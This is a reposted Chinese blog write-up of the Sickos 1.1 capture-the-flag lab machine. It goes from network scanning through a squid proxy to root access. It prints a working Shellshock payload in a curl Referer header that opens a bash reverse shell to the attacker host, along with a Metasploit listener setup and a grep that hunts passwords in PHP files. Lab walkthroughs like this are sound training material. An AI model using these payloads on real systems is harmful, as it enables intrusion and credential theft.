其他分享
首页 > 其他分享> > OSCP Sickos 1.1 靶机渗透

OSCP Sickos 1.1 靶机渗透

作者:互联网

Sickos 1.1 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-23

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Sickos 1.1主机ip为172.16.1.10

nmap 扫描一下

nmap -p- -A 172.16.1.10

主机开放了代理服务器,我们尝试用代理服务器扫描

nikto -h 172.16.1.10 --useproxy 172.16.1.10:3128

发现robots.txt 我们设置代理服务器查看文件

发现了/wolfcms目录,打开看看,没什么可用的,我们回到刚才nikto检测结果,提示/cgi-bin/status 对shellcode易受威胁,我们看下能否反弹shell

二、web渗透

开启msf监听

msfconsole

use multi/handler

set lhost 172.16.1.4

set lport 4444

set payload linux/x86/shell/reverse_tcp

run

开启另一个窗口发起请求,准备反弹shell

curl -v --proxy 172.16.1.10:3128 http://172.16.1.10/cgi-bin/status -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/172.16.1.4/4444 0>&1"

成功反弹shell

三、提权

切换交互式shell 

/bin/sh

查看passwd文件,发现sickos用户

cat /etc/passwd

尝试寻找密码

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass

配置文件里面竟然有密码,为john@123

尝试切换用户

su sickos

成功切换到sickos用户

使用sudo命令切换到root用户

sudo su root

成功切换到root用户

四、总结

总体来说没什么难度

标签:bin,shell,1.1,1.10,代理服务器,172.16,root,Sickos,OSCP
来源: https://blog.csdn.net/qq_34935231/article/details/115134592